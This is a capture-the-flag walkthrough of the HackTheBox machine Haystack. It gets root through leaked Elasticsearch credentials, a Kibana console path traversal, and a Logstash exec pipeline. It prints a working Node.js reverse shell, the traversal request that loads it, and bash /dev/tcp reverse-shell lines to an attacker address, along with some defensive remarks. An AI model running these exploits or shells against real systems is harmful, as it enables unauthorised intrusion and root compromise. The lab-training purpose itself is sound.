Haystack (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.115
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 08:31 GMT
Nmap scan report for 10.10.10.115
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
| 256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_ 256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp open http nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn’t have a title (text/html).
9200/tcp open http nginx 1.12.2
| http-methods:
|_ Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn’t have a title (application/json; charset=UTF-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 – 4.11 (92%), Linux 3.2 – 4.9 (92%), Crestron XPanel control system (90%), Linux 3.18 (89%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 244.40 ms 10.10.14.1
2 243.96 ms 10.10.10.115

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.14 seconds

Open the site in a browser:

http://10.10.10.115/

The page source contains nothing but a single image:

<html>
<body>
<img src=”needle.jpg” />
</body>
</html>

On the terminal, map the hostname in /etc/hosts:

root@kali:~/Downloads# gedit /etc/hosts

10.10.10.115 haystack.htb

Save the file.

root@kali:~/Downloads# curl http://haystack.htb:9200/
{
“name” : “iQEYHgS”,
“cluster_name” : “elasticsearch”,
“cluster_uuid” : “pjrX7V_gSFmJY-DxP4tCQg”,
“version” : {
“number” : “6.4.2”,
“build_flavor” : “default”,
“build_type” : “rpm”,
“build_hash” : “04711c2”,
“build_date” : “2018-09-26T13:34:09.098244Z”,
“build_snapshot” : false,
“lucene_version” : “7.4.0”,
“minimum_wire_compatibility_version” : “5.6.0”,
“minimum_index_compatibility_version” : “5.0.0”
},
“tagline” : “You Know, for Search”
}

root@kali:~/Desktop/HTB/boxes/haystack# gobuster -u http://haystack.htb/ -w /usr/share/wordlists/dirb/common.txt
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://haystack.htb/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/11/01 17:44:51 Starting gobuster
=====================================================
/index.html (Status: 200)
=====================================================
2019/11/01 17:47:06 Finished
=====================================================

root@kali:~/Downloads# wget http://haystack.htb/needle.jpg
--2019-11-10 08:37:48--  http://haystack.htb/needle.jpg
Resolving haystack.htb (haystack.htb)… 10.10.10.115
Connecting to haystack.htb (haystack.htb)|10.10.10.115|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 182982 (179K) [image/jpeg]
Saving to: ‘needle.jpg’

needle.jpg 100%[===================================================================>] 178.69K 243KB/s in 0.7s

2019-11-10 08:37:49 (243 KB/s) – ‘needle.jpg’ saved [182982/182982]

root@kali:~/Downloads# strings needle.jpg
JFIF
Exif
paint.net 4.1.1
UNICODE
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
sc,x
O9 x?
Lg9$
WVj[
-mO4r
xfuu
c;jVm
|eoh
|@gs
&Y7V
{$=1
QLAE
~)x7
=7It
T{V/
8I5K
1/i[
|qouf
e/~M
m>m7S
qT_71
+F~V
_j|5
53mm
kmyk#lV
~(|+
R#!wm]
nTec
|Ge3r
6qg$
yrRO
u?E~
+oEmA
kju”
]CxE
7ly6
m#+n
mG#mj
s8UZ
^=i{
-vFW9L
g-g8K
hX::1VF
nu=4
b9Z=b
l^FA
,]%QR
w?r>:~
Gg l
\h:-
xoAe
U%N:
^(i.&E
q+M)f
^o_A
k}}o
=q>vX
Yu+uVe
-x5#
s}qo4?
KRhdm
KY>V
C^yL
<]k& +kqp WK$o
q4sL
_5|B
[s3t
)KSX
MKTY
GPm5R9
TgLp
n7Vxz
]?yH
FdfVo
;_AxW
ufY7}
~#[i:m
“+]\
Lv6{
8mcY
OKHmm
x~XUv
|GU8
~1|D
U&yu
XUUy
yo”&
jm_Z
/5U9~
u:eN
6eVo1
>>5jw
;[ZO
;KS3
-t6;QWmsQ
>S)T;M7\{Y
=KXH
k+k7
v9-Ze
Xi#P
5MY>o
.1=C
ZT3+2
}Aw\\nn
*+<*v}k [l?a ?{um z$tF 4z\26 ~,|TKX (2@
wq_jx
u9″~
v:,z
fhao
ee_3sW
{46p
\M”‘
jIhyr
kIb/
S;3W
tc.c
{T2^|
|7c&
WMgo
e;Aqi*
I#u!
A|5k
p@2F6
Wmj]il
[}ro
=3K{u
7\|\
5($g
+I3*
<q}- xw\v=”” hz[]h=”” oq_|=”” ,:|*=””>
VdF7
m|3n
5Fff
R4U_
muu”C.
^[XU7m
[kWm9s
V>6x
+_}h?
q=l=;
5i\j c
+Jxrjb”
55[o
W{W=
a-“y
~5xN
_PV
Q,@
WVe`T
(,xX
(TD\*
y$v%
j*lkO]
\u*J
uqk;
U4y2
4|/m&
Tv}CRm
LE*{
+_Fh
fUUZ
_9)T
Iml< 772. .n4XS~ ]>7uX
Z{=>9.$f
<e#\x aaqr=”” sgop=””>+|J
nfUo
*yl”
m#+2
!Wum
9Z’)
H5-B-
xYb$tb
{I{(
Kk{vV]
H[kW
YYw-c
Xddt
yWuT
_1|p
{9!W
k3>ox
x’IY
}-c_
+-mND
)M#y
%Y.t+
4v>/
fKkh
wOVe
s\;6
jV:=
kx’z
7gu>i
pSs7
!\][
EY>]
t]/j
-|/&
=7PVfF
Qoq%
5a|-
_jMr
3%pF^
ws+m
o.Tgk[!
/K[t
L8|7
7+5t:n
vb9a
}6f}
%e?7
5|/32
j+{6
`n?d
m;a\gj9
V5#&
7Ei6
R2;#
.gdv?
qyJ#_
o^]6
B9MJ
^_I2
4o*?
jSou
I[%Xc
-_c~
k~>]
ETfm
^:M27E
=,EK{
FWVM
l]”‘
Ws-y
\bG1S&M
QkohTt< [wqQ Vvkn }kZRoTvF $a^g #R,~ 3+WM 3oc4z +b#O \fgm Ho5′ :
P3nj
}-}{
\{cTU_
[m~s
Gq$?.
u&[[Vf
o~ED
y31m
mtJ< _glo cmqF2 s$)’ Zm6= [\Y$ *$i^ c )Q< UwWG tdou k:g ow *7.z:#v \3ww:TlMu #$vS / |* 3jxY3 bMkV v:|+ ^]|H 9~ \ -tm>
i_>_
k|DW.
COEv~zxW
l[;i?
|My-
MupYVY^Ff
I=ue
xzO’
$xw/
teRV
<|+]’O ]\_ ,t?68[f M3+& s+6W YVEM FjSj aY#W TFVlW l^%o 4[[7 \\I3;375 ^&i$?5s o]_, 6k_t +_]|+ -Mog =IYv aafV Xl77 h:Z* #Y75s b+^Gm Q>UZ
[wY62
6;xQ
y2C6
35ih
9;d ac
333mU
|;mp
>”|V
G^{i>d
-NIc
>0^x+A
g|y6>{
m\W~
Z8>j
>it>s
et[=
nY6{WS$
$7S[m
ffoJ
6qmE
\I$0
*w14U
Y6:J
w%vFG
_Yi>N
slfv
s3y+
mr>.
vffn
3+7J
elcF
1[e_
W7.c
.$Vi
lL%#
>=#C
CXEfT
bj[x
\6Nz
Cyc}
WR8*A
l;4P
|'”It
,k]e
g-NLFqJ
WEL/;wg-J3
_#|T
i~)|Ry
_]3W]
ggyum
OzEV
)!Vf}
=*te
Kkt_
/zR8
W_,j
k_jgy>gj
g6:IA
=>Kx
TV;p
T.-UWuvFG,
5]3?
,)${
mNA>
Un5fi
ZfUo
WReY
[{f]
M”+nf
VVuo
14|Q
,co
-,F2
7[uF
w-zO
aO/;~e
iZ y
I%mi
tY5
y/$_
NciH
g&;(
$7bV
~0$r”
be/v
~l{-
d:j\y
K$>
7ock
MwwX
Gdcs
BfeVoz
<{Uv ~nk>
7Wy&
GvfUo
i>Tj
5Lsf
_BOwmko
5″{_
8mco1w*
%ni#G
-|Zf
|Aoyu#a
[FGx
ElE*g
k”(m
^.y.
XZfUZ
UWqj
3W/7
n5&e
boN’3
#[um
xZcj
`vX@
>;*^x
k;nf
t;U#o
wI%k
=/I_
k3M#
XaVgf
[vDe
8|7f
7gut
.fgRW”
n6eG
egUU_
~fvo
Z4eR|
ge}E
Q”U.
jW_+3
R8QU
b+V_
B[\F
3jWK
>!_]n
3Wdr
‘Md]
#eev
UQ~Uj
N&50
SkK&
&4fM
ZH66
]33;7
RY$`
V3o5
35}i
?(8e
735~
TmKo
3Oyq?
;~U_
kYay
wmr0Z
,Nz8>y
>8Xh
=.nH
ufgv
J68y
>HX#O
x~cg
Px’K
:1Q;
7-^O
=|bM6wD
_?,D
/|TM.
\tcy
;d{;X
sqk%
<uq’ crfi.=”” sn_d=”” wuz_=”” x=”” ck=”” e{=”.I;|” 9c=”” {=”” 8wc+g=”” xgmmb=”” vikn=”” t<|t=”” drno=”” u=””>aJE-
y>fj
.6j57
=kXH
1[km
n8R
RG_?U
\^^*
JmDJ
5-Ad0
gImW
73W9
333n
fffoZ
3+nZ
6*1>
o%$Vfm
_Bx?K[
0GU:1
?5d\
-oxn
1k#*
?]ve;w7
h4&e
*[XY
-w-Q
4NyH
wU &
3Tk’
#m’K
[y.
cg#>
~.|a
&Ufgf
k_A|R
YaxVUM
>8|X
,|@[y&T}
aI$]
>/|LO
^2IU
^V:QP5
iv)q”
]3l^W?v
MVk9
gu36
duZK4
KVXc
Q.Op
ufSZ
Zj ko
w,27
mk]’P
X~/I
z;j^
^nY>_
,5ht;
g:\J
>2jV
uqosun
[rn]
.k;5
R[=/dn
#L~D^
k;Y-
;;Y#
{5s6
SQ4X|B
m?5q
M][X
6Koy
[ugF2Q
_>|B
_=|Q
~’|\
NG+u
Mw{8
\\]F
3,-#*
U-?uH)
|Yyicy$vJ
/<e~ 7r\como$=”” ek{ui&=”” p=””>ff
KX|Y
b1Kh
$]CT,
LM^^
g|jEGqc
> _-
[;gm
}=Yq
_y|1
STfV
{}WP
W_a|
^E3}
7vm>
?#>’G33|
++3O;3z
nY~f
cV_d
mV8~
\?jmnF
w(7W
vOCx
$2lf
t]Y[mmC
imi&
SQ^-
SXxj [
U75rT
tw>6
fmCV
e]2?
XtKV
K[Uo
y/”{
hmQc
-.5o
|Avo’A
KT__
3Uy?i
-O!Q
{uW_
=KTb
m$eK
/z%F\
Tn~*x
^sqn
[uU{y$
svEj
Z?x/t
^wnX
/n>}R
^>34
5XUYWo
t]ZM6
YwWIg’
C=sF>
1{;
:f5$]
nUa\
“bu3[
jXa{
UmgI
IbLMss
>~”~
Euw!i$goRk
n\k_
MJm=
YT:c
u(-|
\3mY
-gR0
>=|F
3Xoe
{sW\
Mw>4
bf|`
n~0~
umJO.
s5~9|`
}Nzq
Fy7n
Dc’-J^< .c/\f k5t:o W=L= YjhuE QU6′ RRR;) G=L= &M=Y g5iF EXUZ y[m} 7-b|L xm/, f=yc |,jRR g)4l Z[Cl !m|ec5 Mgk6 ri~f l[lq ^$egV _nj_ I>V”
7<7y. g2C” Io
3{V_
{3WQ
d7 kP
m:1Q
&1ci
UdTf_
&|/]OKwD
hj6:D2
FKpG8
X[J$
*,k%
*e4j
t}b+
:i3jV
x.gMKO
~!C%
qpq9%
k;[y
V|}
[\>4
XaVm
~EDo
/-[s
cfHU~lW>”
7c41
RmiY
=JgI
oy}m
3^1?2
gSH3
G<c} l?kx~=”” wlc)=”” k=”t[” qw3ws=”” -lwczto=”” ]xcs6=”” kwau=”” 8{n`=”” }wwk=”” jv:]=”” (o=”” w=”” evy.uu{=”” (c^<=”” v5of=”” h]_j=”” <iqy=”” +nuj=”” lc)\=”” )v,s=”” d9oz=”” ]x:=”{M” hz*j:{f=”” _]i=”” x=”” _-wi$=”” -=”” f$pi8=”” 5oua)=”” \x3z=”” purf=”” #_z]=””>m+L
Ydxj
rj`[
~”h|q
ROq#*
e?zG
U-d7
dXQ{
[]kvz^
.$]G
ufw_
g_|T
6FhU
7.in
M42M
$sno
/73&
X|/gq
(?b;
2M$?+|
=”iF
^”Kx
;]5dZ
$r#H
UY!m
;37s]
{)>Te
3$rn
/$fgf-Y
NiHI>o
i 5~
nw+B
yhmN< `pug] -q#6 .kZ- ^[9B {:3A k}Jm >jn_
khY~
I4-&
cvLi
.Km[T
^m.6m
k}WV
\xz|
U{Vo
xVTuZ
ouUe^
“~Gw,c
;~f]
s^]lE
N’tO
Y{-~z~
u’TU
hztp
}5[l
j^>{
U#cJqO
5Tds
TN/iir
PXwy?y
O3miF
gOXWk/5
|\&H
r+$l
;;Kx
5{kt-$
>^%,
<m{#} t(gc=”” .zf=”” _3]?=”” [j0}=”” ;xew=”” ]xh~v=”” ^tm){z=”” !o3p=”” vj*=””>
ggfn
Z_^”
$fMR
>,|d
w5p7>%
lI3^
&eUVoj
4m$|W=J
cVve]
F$J(
F”]G
~Y>Z
_PMBM
r{Ox
_BxWB
Sog|
,+#|
CRI>
usWz
‘dcb8c
SX]B
zXz?h
cedu
>hr]/
#-o)=
0vwg’
Vt)-
<aa% do1y~=”” qo`xn=”” _=”R^” csuq=”” 5maf=”” u]^i=”” ‘-im=””>”|DmB
beY?
IsH1
!\I+
;5I7
~5[i
P>S’O
$?iO
>-[F
n’xG
jk[=
={Y[
MWYf
e`F2
1QVAE
#@?Xi
qn6EFVw?
ss#m
(GSl._S
{=&;Xn
6}5:
y/.$
Ccen
MrI-
=’CUgw
333n;
bKhn
I#W.
/kT+TO
+mSV
i)u%
2#$M#n
*[Oqm’
_6W)
|LVf
#nbM[
+[dVf
Ikq|
?iMs\
Wm}/
xT$1
|)k”
4[?E>&~
:xs T=
i2\m
eqqt
Uj-YZ
[F&< [?2O 5Kko ZUVUlW: HWs. mN7:) ;k}Gr} mcff UwRj W4m1 ;q[Vv[ eein )?.5
%Vg}
9|}v
7]|^
}2DWT}
_/NR
s;3t
OKm.
n6$Hn
sIhY
+#cR
njcB
&EO-
Tu(V
J7;U
+zW!qc5
uF7F
mUUY
Xo`H+
2Mw< ODvQ -?~} ^;ofVn Caes zW>”
?Ggf
.>1|t
>%i_
i5 < 9*JU&p_ aq+2 t}”GO “4v: q#aY wmFs C Em k^=J kuom #eTUj g_feZ k37j mt{= ~”xf=5 5LnM UVoj ;eeF >”_,1
-t^:
WDcs
Zlsy
csJq
*l2,-
KIk]
,VE]
giu 1
UUUF
@kZ|
6nO5C37
/![;xb
\;\46p
>-|n
<|V*Sd wfn=+ ?{#m >k_;
K^|Z
wg^3
#r3.
mV:Q
+CUH
|i}gou$zz
9.o.< w1s_3~ $B1?M? j$tF< \3[F #N0/ 5sb1 }k_X 8pte: [mu{H #HdVt M#N% {[gi V;Tfe ;3*6 q^N; PI%}]:~ Tb6f wmg* c,o7 O4HuHV W4==~_ *:nz YXY[ 19fc sNWaE ,peb kaHd ee`A ,9X- nU@X 9}J#uq }_Dix Ueyf 9.oo O2I&l 6mJm zL;Q 5tD] >*yl
7#~X
KWU:6
}MtS
33nuj
/.FV
]],;
73V,
5Tcc9T
jS;7
2_\*
mtz/
j%R’]<9 -bz>
i]i?
:4Uu;
%UC;*
QkFO1
}1]t0
Ue#*
#nb[
*09j
cgqt
l3M3
Ff^X
lt=k
!l~H
~M^{
3S\
hz=
U[mx
;PdO
iZ61
Wlcs
[mgG”6
&Ozz
C5}#
q}{q%
m:ti
IRKY
n|=au
^>_G
R\\7
RNE_
V-vah
gf?1
G]:j
foADi
9*T(_N
kAmv
#i@8
7DU?w
I3n[
;8[s*
b\t:
ivWz
k!.u{
7n?1#
QEh@QE
l>VQ
ggHQ
k)^?
XQ~o
m~$h
;[]&
_G|,
tf^R
{-hx
MWk?
}Ic]
tz||}
*+=o
eO-~OZ
+].L”n
[x{s
}%K/
j
[czW6|q
s&~lZ|
|1y
t
_Cx_
Nr:c
~/_1W
_+m]
Cu#mZ
+9FR
}&W(
ZkmC
Iw 7
sh?
z e2
\\;n
jw92
-wjb
>%Zs
HF{bs
j^&{Va
Y[mtZ
I48Q
5wV?
]i]a
usup
Kvv_
>5[hp
hn$[hw
Mqw#*
5kiz+L
Q)F&
w3ma_
QTnf’
~2YE
Y]GUoS
)NKf~-
y,Y8
>+|”V
I6ln]A
;m@66
~’xffb
Ee,=W
*xn8PK#j~
rG[X
e9sH
My#4
FOOZ
ufYF
O’bu
N{M3
:t6Q6
STW5
*Oo!;.o|?>
.n2FrZ
rrNMz
#=pMr
BN2I
,’*’
I$f2/<-iy
bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==

The last string in the output is Base64 text appended to the image. Decode it:

root@kali:~/Downloads# echo bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg== | base64 -d
la aguja en el pajar es "clave"

Translation: la aguja en el pajar es "clave" => the needle in the haystack is "key"

root@kali:~/Downloads# curl http://haystack.htb:9200/_search?q=clave
{“took”:121,”timed_out”:false,”_shards”:{“total”:11,”successful”:11,”skipped”:0,”failed”:0},”hits”:{“total”:2,”max_score”:5.9335938,”hits”:[{“_index”:”quotes”,”_type”:”quote”,”_id”:”45″,”_score”:5.9335938,”_source”:{“quote”:”Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg “}},{“_index”:”quotes”,”_type”:”quote”,”_id”:”111″,”_score”:5.3459888,”_source”:{“quote”:”Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk=”}}]}}

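Each hit is a Spanish sentence that ends in a Base64 string. After translation and decoding (for example with `echo dXNlcjogc2VjdXJpdHkg | base64 -d`):

Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg => I have to save the password for the machine: user: security

Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk= => This key cannot be lost, I keep it here: pass: spanish.is.key

The search needed no credentials: the Elasticsearch REST API on port 9200 answers anyone who can reach it, so every index is readable, and Base64 is an encoding, not protection. Requiring authentication on the API, or not exposing port 9200 beyond the hosts that need it, closes this step; credentials do not belong in an index in the first place.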

root@kali:~/Downloads# ssh security@haystack.htb
The authenticity of host ‘haystack.htb (10.10.10.115)’ can’t be established.
ECDSA key fingerprint is SHA256:ihn2fPA4jrn1hytN0y9Z3vKpIKuL4YYe3yuESD76JeA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ‘haystack.htb,10.10.10.115’ (ECDSA) to the list of known hosts.
security@haystack.htb’s password: spanish.is.key

Last failed login: Sun Nov 10 05:56:30 -03 2019 from 10.10.15.149 on ssh:notty
There were 2 failed login attempts since the last successful login.
Last login: Sun Nov 10 05:30:30 2019 from 10.10.15.14

[security@haystack ~]$

[security@haystack ~]$ cat user.txt
04d18bc79dac1d4XXXXXXXXXXXXXXXXXX

[security@haystack ~]$ cd /etc/logstash/conf.d/

[security@haystack conf.d]$ ls -la
total 12
drwxrwxr-x. 2 root kibana 62 Jun 24 08:12 .
drwxr-xr-x. 3 root root 183 Jun 18 22:15 ..
-rw-r-----. 1 root kibana 131 Jun 20 10:59 filter.conf
-rw-r-----. 1 root kibana 186 Jun 24 08:12 input.conf
-rw-r-----. 1 root kibana 109 Jun 24 08:12 output.conf

[security@haystack conf.d]$ cat input.conf
cat: input.conf: Permission denied

[security@haystack conf.d]$ cat filter.conf
cat: filter.conf: Permission denied

[security@haystack conf.d]$ cat output.conf
cat: output.conf: Permission denied

[security@haystack conf.d]$ ss -lnt
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 *:80 *:*
LISTEN 0 128 *:9200 *:*
LISTEN 0 128 *:22 *:*
LISTEN 0 128 127.0.0.1:5601 *:*
LISTEN 0 128 ::ffff:127.0.0.1:9000 :::*
LISTEN 0 128 :::80 :::*
LISTEN 0 128 ::ffff:127.0.0.1:9300 :::*
LISTEN 0 128 :::22 :::*
LISTEN 0 50 ::ffff:127.0.0.1:9600 :::*

root@kali:~/Downloads# ssh -L 5601:127.0.0.1:5601 security@haystack.htb
security@haystack.htb’s password: spanish.is.key
Last login: Sun Nov 10 05:56:42 2019 from 10.10.15.149

[security@haystack ~]$

[security@haystack conf.d]$ vim /dev/shm/shell.js

// Self-invoking function: the body runs as soon as a Node.js process loads this file.
(function(){
// net supplies the TCP socket, child_process the shell; /bin/sh is spawned with no arguments.
var net = require(“net”),
cp = require(“child_process”),
sh = cp.spawn(“/bin/sh”, []);
var client = new net.Socket();
// Outbound TCP connection to 10.10.15.149:5555; once connected, the socket is wired to the shell's stdin, stdout and stderr.
// Detection note: a /bin/sh child of the loading process and this outbound connection are the observable artefacts.
client.connect(5555, “10.10.15.149”, function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Author's note: prevents the Node.js application from crashing (presumably the loader expects a return value; not verifiable from this page)
})();

:wq!

On another terminal on the Kali machine, start a listener:

root@kali:~/Downloads# nc -lvnp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555

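Back in the SSH session on the target, request the Kibana Console endpoint with a path-traversal value in the `apis` parameter. Kibana listens only on 127.0.0.1:5601 (see the ss output), so the request is made from the host itself; the SSH port forward above is only needed to browse Kibana from the Kali machine. The endpoint appears to load the referenced file inside the Kibana Node.js process without validating the path, so the file runs with the privileges of the Kibana service account.

For defenders: any local user who can write a file anywhere on disk and reach port 5601 gets code execution as that account. Upgrading Kibana to a release in which this endpoint validates the parameter removes the issue, and requests to /api/console/api_server that contain ../ sequences are a clear signature to alert on.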

[security@haystack conf.d]$ curl -v “http://localhost:5601/api/console/api_server?apis=../../../../../../../../../../../dev/shm/shell.js”
* About to connect() to localhost port 5601 (#0)
* Trying ::1…
* Connection refused
* Trying 127.0.0.1…
* Connected to localhost (127.0.0.1) port 5601 (#0)
> GET /api/console/api_server?apis=../../../../../../../../../../../dev/shm/shell.js HTTP/1.1
> User-Agent: curl/7.29.0
> Host: localhost:5601
> Accept: */*
>

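The listener receives a shell running as the kibana user, whose group can read the Logstash configuration files that the security user could not: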

root@kali:~/Downloads# nc -lvnp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.115.
Ncat: Connection from 10.10.10.115:59234.

whoami
kibana
hostname
haystack

cd /etc/logstash/conf.d/
ls -lrt
total 12
-rw-r-----. 1 root kibana 131 jun 20 10:59 filter.conf
-rw-r-----. 1 root kibana 186 jun 24 08:12 input.conf
-rw-r-----. 1 root kibana 109 jun 24 08:12 output.conf

cat input.conf
input {
file {
path => “/opt/kibana/logstash_*”
start_position => “beginning”
sincedb_path => “/dev/null”
stat_interval => “10 second”
type => “execute”
mode => “read”
}
}
cat filter.conf
filter {
if [type] == “execute” {
grok {
match => { “message” => “Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}” }
}
}
}
cat output.conf
output {
if [type] == “execute” {
stdout { codec => json }
exec {
command => “%{comando} &”
}
}
}

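Read together, the three files form a command-execution pipeline: input.conf watches every file matching /opt/kibana/logstash_* (stat interval 10 seconds), filter.conf captures whatever follows "Ejecutar comando :" into the field comando, and output.conf passes that field to exec. Whoever can write to /opt/kibana therefore runs commands as the account Logstash runs under, which the shell obtained below shows to be root. Running Logstash as an unprivileged user, never building an exec command from event data, and keeping the watched path unwritable by other service accounts each break this chain.

On another terminal, start a second listener: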

root@kali:~/Downloads# nc -lvp 6666
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666

In the kibana shell, write a line in the format the grok filter expects to a file that matches the input path:

cd /opt/kibana/
touch /opt/kibana/logstash_1
echo “Ejecutar comando : bash -i >& /dev/tcp/10.10.15.149/6666 0>&1” > logstash_1

touch /opt/kibana/logstash_2
echo “Ejecutar comando : bash -i >& /dev/tcp/10.10.15.149/6666 0>&1” > logstash_2

touch /opt/kibana/logstash_3
echo “Ejecutar comando : bash -i >& /dev/tcp/10.10.15.149/6666 0>&1” > logstash_3

On the listener shell:

root@kali:~/Downloads# nc -lvp 6666
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 10.10.10.115.
Ncat: Connection from 10.10.10.115:55618.
bash: no hay control de trabajos en este shell

[root@haystack /]# uname -a; hostname; whoami; id;
uname -a; hostname; whoami; id;
Linux haystack 3.10.0-957.1.3.el7.x86_64 #1 SMP Thu Nov 29 14:49:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
haystack
root
uid=0(root) gid=0(root) grupos=0(root) contexto=system_u:system_r:unconfined_service_t:s0

[root@haystack /]# cd /root
cd /root

[root@haystack ~]# cat root.txt
cat root.txt
3f5f727c38d9f70e1XXXXXXXXXXXXXXXXXXXXXXXX

@SAKSHAM DIXIT